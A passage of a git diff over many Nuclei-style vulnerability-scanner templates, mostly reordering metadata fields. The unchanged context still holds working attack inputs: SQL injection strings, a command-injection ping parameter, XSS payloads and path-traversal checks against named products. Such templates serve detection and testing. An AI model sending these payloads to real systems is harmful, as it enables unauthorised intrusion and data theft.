a/http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml b/http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml index cf3cf269cc..bc6520549d 100644 --- a/http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml +++ b/http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml @@ -9,8 +9,8 @@ info: - https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595 - https://www.zeroscience.mk/codes/brightsign_ssrf.txt metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"BrightSign" tags: ssrf,brightsign,unauth diff --git a/http/vulnerabilities/other/bullwark-momentum-lfi.yaml b/http/vulnerabilities/other/bullwark-momentum-lfi.yaml index acb931635a..d38d2a746d 100644 --- a/http/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/http/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -14,9 +14,9 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-query: Bullwark fofa-query: "Bullwark" + version: Bullwark Momentum Series Web Server JAWS/1.0 tags: lfi,edb,bullwark http: diff --git a/http/vulnerabilities/other/cacti-weathermap-file-write.yaml b/http/vulnerabilities/other/cacti-weathermap-file-write.yaml index 305624284b..7364970c97 100644 --- a/http/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/http/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -4,14 +4,15 @@ info: name: Cacti Weathermap File Write author: pikpikcu severity: medium - tags: injection,cacti metadata: max-request: 2 + tags: injection,cacti http: - method: GET path: - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7" + - method: GET path: - "{{BaseURL}}/plugins/weathermap/configs/poc.conf" @@ -22,6 +23,7 @@ http: words: - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8" part: body + - type: status status: - 200 diff --git a/http/vulnerabilities/other/caimore-gateway-rce.yaml b/http/vulnerabilities/other/caimore-gateway-rce.yaml index 1c34cb5367..bece9fb1ff 100644 --- a/http/vulnerabilities/other/caimore-gateway-rce.yaml +++ b/http/vulnerabilities/other/caimore-gateway-rce.yaml @@ -22,7 +22,6 @@ http: Accept-Encoding: gzip PingAddr=127.0.0.1%7Cecho%20{{randstr}}&PingPackNumb=1&PingMsg= - - | GET /pingmessages HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml b/http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml index f9f9d70500..8915a44b7a 100644 --- a/http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml +++ b/http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: carel,lfi,traversal,unauth,bacnet metadata: max-request: 1 + tags: carel,lfi,traversal,unauth,bacnet http: - method: GET diff --git a/http/vulnerabilities/other/carrental-xss.yaml b/http/vulnerabilities/other/carrental-xss.yaml index 0d3f7e4115..b0d2e4d4ab 100644 --- a/http/vulnerabilities/other/carrental-xss.yaml +++ b/http/vulnerabilities/other/carrental-xss.yaml @@ -14,10 +14,10 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.html:"Car Rental Management System" - tags: xss,cms,authenticated,edb + tags: xss,cms,authenticated,edb,intrusive http: - raw: @@ -27,7 +27,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | POST /admin/ajax.php?action=save_category HTTP/1.1 Host: {{Hostname}} @@ -45,7 +44,6 @@ http: ------WebKitFormBoundaryCMJ5bh3B6m9767Em-- - - | GET /admin/index.php?page=categories HTTP/1.1 Host: {{Hostname}} @@ -53,6 +51,7 @@ http: host-redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/http/vulnerabilities/other/caucho-resin-info-disclosure.yaml index 6e5368255d..b27f5559c7 100644 --- a/http/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/http/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/exploits/27888 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: exposure,resin,caucho,edb metadata: max-request: 2 + tags: exposure,resin,caucho,edb http: - method: GET diff --git a/http/vulnerabilities/other/chamilo-lms-sqli.yaml b/http/vulnerabilities/other/chamilo-lms-sqli.yaml index 2f027674f1..3da101d608 100644 --- a/http/vulnerabilities/other/chamilo-lms-sqli.yaml +++ b/http/vulnerabilities/other/chamilo-lms-sqli.yaml @@ -8,11 +8,11 @@ info: reference: https://packetstormsecurity.com/files/162572/Chamilo-LMS-1.11.14-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: chamilo,sqli metadata: max-request: 2 + tags: chamilo,sqli http: - raw: @@ -22,7 +22,6 @@ http: Content-Type: application/x-www-form-urlencoded type=image&field_id=image&tag=image&from=image&search=image&options=["test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'{{randstr}}'); INSERT INTO extra_field_options(option_value) VALUES ('{{randstr}}'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '{{randstr}}', 16,0) ON DUPLICATE KEY UPDATE tag='{{randstr}}', field_id=16, count=0; -- "] - - | POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/chamilo-lms-xss.yaml b/http/vulnerabilities/other/chamilo-lms-xss.yaml index d7b2a8be3d..a5b5c8514e 100644 --- a/http/vulnerabilities/other/chamilo-lms-xss.yaml +++ b/http/vulnerabilities/other/chamilo-lms-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,chamilo metadata: max-request: 1 + tags: xss,chamilo http: - method: GET @@ -27,9 +27,11 @@ http: part: body words: - 'agenda_js.php?type=xss" onmouseover=alert(document.domain)' + - type: status status: - 200 + - type: word part: header words: diff --git a/http/vulnerabilities/other/ckan-dom-based-xss.yaml b/http/vulnerabilities/other/ckan-dom-based-xss.yaml index 3db63ed4cd..1330d07590 100644 --- a/http/vulnerabilities/other/ckan-dom-based-xss.yaml +++ b/http/vulnerabilities/other/ckan-dom-based-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"ckan 2.8.2" || html:"ckan 2.3" tags: dom,xss diff --git a/http/vulnerabilities/other/clodop-printer-lfi.yaml b/http/vulnerabilities/other/clodop-printer-lfi.yaml index 7933be851c..6055058c8f 100644 --- a/http/vulnerabilities/other/clodop-printer-lfi.yaml +++ b/http/vulnerabilities/other/clodop-printer-lfi.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/8e4f0be1f75a71cffe4b2c2c558ad1cd4d03d9a7/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/C-Lodop%E6%89%93%E5%8D%B0%E6%9C%BA%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: + verified: true max-request: 1 shodan-query: title:"Welcome to C-Lodop" fofa-query: title="C-Lodop" - verified: true tags: c-lodop,lfi,printer,iot http: diff --git a/http/vulnerabilities/other/cloud-oa-system-sqli.yaml b/http/vulnerabilities/other/cloud-oa-system-sqli.yaml index be74d958c2..78b6786b7e 100644 --- a/http/vulnerabilities/other/cloud-oa-system-sqli.yaml +++ b/http/vulnerabilities/other/cloud-oa-system-sqli.yaml @@ -9,11 +9,10 @@ info: reference: - https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/xray_pocs/yaml-poc-eqccd-eqccd_oa-sql_injection-CT-456760.yml#L8 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="全程云办公" && body="/OA/WebResource.axd" tags: cloud,cloudoa,sqli - variables: num: "999999999" @@ -49,4 +48,4 @@ http: - type: status status: - - 500 \ No newline at end of file + - 500 diff --git a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml index e955c86bdb..62843767c4 100755 --- a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml +++ b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml @@ -10,8 +10,8 @@ info: - https://cn-sec.com/archives/1580677.html - https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json#L28 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="CmsEasy" tags: cmseasy,sqli @@ -29,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/other/comai-ras-cookie-bypass.yaml b/http/vulnerabilities/other/comai-ras-cookie-bypass.yaml index f76c28ab9c..ed08a4f3b8 100755 --- a/http/vulnerabilities/other/comai-ras-cookie-bypass.yaml +++ b/http/vulnerabilities/other/comai-ras-cookie-bypass.yaml @@ -10,9 +10,9 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%A7%91%E8%BF%88/%E7%A7%91%E8%BF%88%20RAS%E7%B3%BB%E7%BB%9F%20Cookie%E9%AA%8C%E8%AF%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E.md - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/maike-ras-cookie-bypass.yaml metadata: + verified: true max-request: 1 fofa-query: app="科迈-RAS系统" - verified: true tags: comai-ras,ras,kemai http: @@ -36,4 +36,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/http/vulnerabilities/other/commax-biometric-auth-bypass.yaml index 7ca6fe93bd..641c001935 100644 --- a/http/vulnerabilities/other/commax-biometric-auth-bypass.yaml +++ b/http/vulnerabilities/other/commax-biometric-auth-bypass.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.exploit-db.com/exploits/50206 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php - tags: commax,auth-bypass,edb metadata: max-request: 1 + tags: commax,auth-bypass,edb http: - raw: @@ -24,7 +24,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/vulnerabilities/other/commax-credentials-disclosure.yaml b/http/vulnerabilities/other/commax-credentials-disclosure.yaml index 60b5a8be26..f63f2aa35f 100644 --- a/http/vulnerabilities/other/commax-credentials-disclosure.yaml +++ b/http/vulnerabilities/other/commax-credentials-disclosure.yaml @@ -8,9 +8,9 @@ info: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php - tags: commax,exposure,camera,iot metadata: max-request: 1 + tags: commax,exposure,camera,iot http: - method: GET diff --git a/http/vulnerabilities/other/comtrend-password-exposure.yaml b/http/vulnerabilities/other/comtrend-password-exposure.yaml index 7e6ec973e9..cf1c423475 100644 --- a/http/vulnerabilities/other/comtrend-password-exposure.yaml +++ b/http/vulnerabilities/other/comtrend-password-exposure.yaml @@ -7,9 +7,9 @@ info: description: Comtrend ADSL CT-5367 C01_R12 router is susceptible to remote code execution. A remote user can execute arbitrary commands via the telnet interface, The password for this interface is leaked to unauthenticated users via the password.cgi endpoint. reference: - https://www.exploit-db.com/exploits/16275 - tags: router,exposure,iot,rce,edb metadata: max-request: 1 + tags: router,exposure,iot,rce,edb http: - method: GET diff --git a/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml index efe6935a52..2ad205c424 100644 --- a/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml +++ b/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml @@ -9,11 +9,11 @@ info: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: rce,fileupload,intrusive,cloud,chuangtian metadata: max-request: 2 + tags: rce,fileupload,intrusive,cloud,chuangtian http: - raw: @@ -31,7 +31,6 @@ http: ------WebKitFormBoundaryfcKRltGv-- - - | GET /Upload/test/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/couchdb-adminparty.yaml b/http/vulnerabilities/other/couchdb-adminparty.yaml index 65af43d7db..de88bd3970 100644 --- a/http/vulnerabilities/other/couchdb-adminparty.yaml +++ b/http/vulnerabilities/other/couchdb-adminparty.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: couchdb metadata: max-request: 1 + tags: couchdb http: - method: GET @@ -28,6 +28,7 @@ http: - Erlang OTP/ part: header condition: and + - type: word words: - total_rows diff --git a/http/vulnerabilities/other/crawlab-lfi.yaml b/http/vulnerabilities/other/crawlab-lfi.yaml index 2534e62dc0..fac9042790 100644 --- a/http/vulnerabilities/other/crawlab-lfi.yaml +++ b/http/vulnerabilities/other/crawlab-lfi.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Crawlab%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="Crawlab" tags: crawlab,lfi diff --git a/http/vulnerabilities/other/crystal-live-server-lfi.yaml b/http/vulnerabilities/other/crystal-live-server-lfi.yaml index c3c81e6893..2daed2db98 100644 --- a/http/vulnerabilities/other/crystal-live-server-lfi.yaml +++ b/http/vulnerabilities/other/crystal-live-server-lfi.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,crystal metadata: max-request: 1 + tags: lfi,crystal http: - method: GET diff --git a/http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml b/http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml index a860b14b37..a48c66cf2b 100644 --- a/http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml +++ b/http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: cscart,lfi metadata: max-request: 1 + tags: cscart,lfi http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/cvms-sqli.yaml b/http/vulnerabilities/other/cvms-sqli.yaml index a7099be762..9ba58b94f1 100644 --- a/http/vulnerabilities/other/cvms-sqli.yaml +++ b/http/vulnerabilities/other/cvms-sqli.yaml @@ -11,11 +11,11 @@ info: - https://packetstormsecurity.com/files/158476/Company-Visitor-Management-System-CVMS-1.0-SQL-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 tags: cvms,sqli,auth-bypass,cms,edb,packetstorm http: @@ -29,6 +29,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/dicoogle-pacs-lfi.yaml b/http/vulnerabilities/other/dicoogle-pacs-lfi.yaml index 387db6e25e..2aa1297a55 100644 --- a/http/vulnerabilities/other/dicoogle-pacs-lfi.yaml +++ b/http/vulnerabilities/other/dicoogle-pacs-lfi.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: edb,windows,lfi,dicoogle metadata: max-request: 1 + tags: edb,windows,lfi,dicoogle http: - method: GET diff --git a/http/vulnerabilities/other/digital-ocean-ssrf.yaml b/http/vulnerabilities/other/digital-ocean-ssrf.yaml index e59574296d..6fe7aeaa98 100644 --- a/http/vulnerabilities/other/digital-ocean-ssrf.yaml +++ b/http/vulnerabilities/other/digital-ocean-ssrf.yaml @@ -8,9 +8,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - tags: digitalocean,ssrf metadata: max-request: 2 + tags: digitalocean,ssrf http: - raw: @@ -25,6 +25,7 @@ http: stop-at-first-match: true unsafe: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/digitalrebar-traversal.yaml b/http/vulnerabilities/other/digitalrebar-traversal.yaml index 917a0b8f07..2efc4952cd 100644 --- a/http/vulnerabilities/other/digitalrebar-traversal.yaml +++ b/http/vulnerabilities/other/digitalrebar-traversal.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,rackn,digitalrebar metadata: max-request: 1 + tags: lfi,rackn,digitalrebar http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/vulnerabilities/other/discourse-xss.yaml b/http/vulnerabilities/other/discourse-xss.yaml index c634ea39c4..9d9f6056da 100644 --- a/http/vulnerabilities/other/discourse-xss.yaml +++ b/http/vulnerabilities/other/discourse-xss.yaml @@ -12,14 +12,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,discourse metadata: max-request: 1 + tags: xss,discourse http: - method: GET path: - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E' + matchers-condition: and matchers: - type: status diff --git a/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml b/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml index 0fbb0213cf..3bcf74eba7 100644 --- a/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml +++ b/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml @@ -22,12 +22,12 @@ http: {{randstr}}.txt dixell-xweb500-filewrite - - | GET /logo/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: dsl diff --git a/http/vulnerabilities/other/dlink-850L-info-leak.yaml b/http/vulnerabilities/other/dlink-850L-info-leak.yaml index 119ebf8ccb..85944a3b27 100644 --- a/http/vulnerabilities/other/dlink-850L-info-leak.yaml +++ b/http/vulnerabilities/other/dlink-850L-info-leak.yaml @@ -6,16 +6,18 @@ info: severity: info reference: - https://xz.aliyun.com/t/2941 - tags: dlink metadata: max-request: 1 + tags: dlink http: - method: POST path: - "{{BaseURL}}/hedwig.cgi" + body: | ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml + headers: Cookie: uid=R8tBjwtFc8 Content-Type: text/xml @@ -25,6 +27,7 @@ http: - type: status status: - 200 + - type: word words: - "" diff --git a/http/vulnerabilities/other/dotnetcms-sqli.yaml b/http/vulnerabilities/other/dotnetcms-sqli.yaml index 92b930db97..cfe0843d3f 100644 --- a/http/vulnerabilities/other/dotnetcms-sqli.yaml +++ b/http/vulnerabilities/other/dotnetcms-sqli.yaml @@ -10,13 +10,13 @@ info: - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"dotnetcms" - tags: dotnetcms,dotnet,sqli + tags: dotnetcms,dotnet,sqli,intrusive http: - method: GET diff --git a/http/vulnerabilities/other/dss-download-fileread.yaml b/http/vulnerabilities/other/dss-download-fileread.yaml index 3d9fa19095..6f6b6afcd4 100644 --- a/http/vulnerabilities/other/dss-download-fileread.yaml +++ b/http/vulnerabilities/other/dss-download-fileread.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,dss,lfr metadata: max-request: 1 + tags: lfi,dss,lfr http: - method: GET @@ -20,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/other/duomicms-sql-injection.yaml b/http/vulnerabilities/other/duomicms-sql-injection.yaml index 262f425c18..accf738b8a 100644 --- a/http/vulnerabilities/other/duomicms-sql-injection.yaml +++ b/http/vulnerabilities/other/duomicms-sql-injection.yaml @@ -9,14 +9,13 @@ info: - https://redn3ck.github.io/2016/11/01/duomiCMS/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"DuomiCMS" tags: duomicms,sqli - variables: num: "999999999" diff --git a/http/vulnerabilities/other/dzzoffice-xss.yaml b/http/vulnerabilities/other/dzzoffice-xss.yaml index 909f911f60..bc1dc7144f 100644 --- a/http/vulnerabilities/other/dzzoffice-xss.yaml +++ b/http/vulnerabilities/other/dzzoffice-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"dzzoffice" tags: dzzoffice,xss diff --git a/http/vulnerabilities/other/eaa-app-lfi.yaml b/http/vulnerabilities/other/eaa-app-lfi.yaml index 1204847e17..d6a12aa9ec 100644 --- a/http/vulnerabilities/other/eaa-app-lfi.yaml +++ b/http/vulnerabilities/other/eaa-app-lfi.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%9C%86%E6%99%BA%E7%A7%91%E6%8A%80%20VA%E8%99%9A%E6%8B%9F%E5%BA%94%E7%94%A8%E5%B9%B3%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="EAA益和应用接入系统" tags: eaa,lfi @@ -38,4 +38,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/other/easyimage-downphp-lfi.yaml b/http/vulnerabilities/other/easyimage-downphp-lfi.yaml index f095dfae89..a03c2c1bc9 100644 --- a/http/vulnerabilities/other/easyimage-downphp-lfi.yaml +++ b/http/vulnerabilities/other/easyimage-downphp-lfi.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="EasyImage-简单图床" tags: easyimage,lfi,exposure,config diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index e2ac116bc0..8a66d03b79 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" tags: ecology,ecology-oa,sqli diff --git a/http/vulnerabilities/other/ecshop-sqli.yaml b/http/vulnerabilities/other/ecshop-sqli.yaml index 346d23a282..19397ffd75 100644 --- a/http/vulnerabilities/other/ecshop-sqli.yaml +++ b/http/vulnerabilities/other/ecshop-sqli.yaml @@ -13,11 +13,11 @@ info: - https://www.shutingrz.com/post/ad_hack-ec_exploit/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="ECShop" tags: sqli,php,ecshop @@ -28,7 +28,6 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} - - | GET /user.php?act=login HTTP/1.1 Host: {{Hostname}} @@ -36,6 +35,7 @@ http: Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/vulnerabilities/other/ecsimagingpacs-rce.yaml b/http/vulnerabilities/other/ecsimagingpacs-rce.yaml index 52ffc6a05e..3a8f4ab226 100644 --- a/http/vulnerabilities/other/ecsimagingpacs-rce.yaml +++ b/http/vulnerabilities/other/ecsimagingpacs-rce.yaml @@ -6,12 +6,12 @@ info: severity: critical description: ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access. reference: https://www.exploit-db.com/exploits/49388 - metadata: - max-request: 1 - verified: false - tags: ecsimagingpacs,rce classification: cwe-id: CWE-78 + metadata: + verified: false + max-request: 1 + tags: ecsimagingpacs,rce http: - method: GET diff --git a/http/vulnerabilities/other/eibiz-lfi.yaml b/http/vulnerabilities/other/eibiz-lfi.yaml index 9aa5a92d52..87da5fc325 100644 --- a/http/vulnerabilities/other/eibiz-lfi.yaml +++ b/http/vulnerabilities/other/eibiz-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,eibiz,packetstorm,windows metadata: max-request: 1 + tags: lfi,eibiz,packetstorm,windows http: - method: GET diff --git a/http/vulnerabilities/other/elFinder-path-traversal.yaml b/http/vulnerabilities/other/elFinder-path-traversal.yaml index 34d64c7dd9..e00e62c1d6 100644 --- a/http/vulnerabilities/other/elFinder-path-traversal.yaml +++ b/http/vulnerabilities/other/elFinder-path-traversal.yaml @@ -8,14 +8,14 @@ info: elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. reference: - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - metadata: - max-request: 1 - verified: true - shodan-query: title:"elfinder" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + metadata: + verified: true + max-request: 1 + shodan-query: title:"elfinder" tags: lfi,elfinder http: diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index be2d656ca2..44115cca5a 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -16,9 +16,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true 